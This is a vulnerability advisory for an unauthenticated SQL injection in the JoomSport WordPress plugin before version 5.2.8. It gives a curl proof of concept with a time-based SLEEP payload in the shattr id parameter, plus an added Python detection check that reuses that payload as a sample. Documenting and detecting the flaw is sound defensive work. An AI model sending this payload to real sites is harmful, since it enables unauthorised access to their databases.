The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted
2. Invoke the following curl command to induce a 10 second sleep:

    time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \
      --data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'
CPE

Name | Operator | Version |
---|---|---|
joomsport-sports-league-results-management | lt | 5.2.8 |
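
A detection check for the request shape shown in the proof of concept, as an added example (not code from the plugin or from the advisory). It assumes the query string and form body of each `admin-ajax.php` request are available, for instance from a WAF or reverse-proxy log, and that a legitimate `id` inside `shattr` is a plain integer; the function names and sample records are constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qs

ACTION = "joomsport_md_load"          # AJAX action named in the advisory
_INT = re.compile(r"\d+")             # assumption: a valid id is a bare integer


def is_suspicious(query: str, body: str) -> bool:
    """True if a joomsport_md_load request carries a non-integer shattr id."""
    params = parse_qs(query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))
    if ACTION not in params.get("action", []):
        return False                  # different AJAX action, out of scope
    for raw in params.get("shattr", []):
        try:
            attrs = json.loads(raw)
        except ValueError:
            return True               # malformed JSON sent to this action
        if not isinstance(attrs, dict):
            return True
        value = attrs.get("id")
        if value is not None and not _INT.fullmatch(str(value)):
            return True               # id holds more than digits
    return False


def scan(records):
    """Return the indexes of the (query, body) records that should be reviewed."""
    return [i for i, (q, b) in enumerate(records) if is_suspicious(q, b)]


# Constructed sample records; the third reuses the request body from the
# proof of concept above.
SAMPLES = [
    ("action=joomsport_md_load", 'mdId=1&shattr={"id":"12"}'),
    ("action=heartbeat", "interval=60"),
    ("action=joomsport_md_load",
     'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'),
    ("action=joomsport_md_load", "mdId=1&shattr=not-json"),
]

if __name__ == "__main__":
    for index in scan(SAMPLES):
        print("review request", index, SAMPLES[index][1])
```

Sites running a version below 5.2.8 are the ones where a hit matters most; on patched installs the same check still shows who is probing the endpoint.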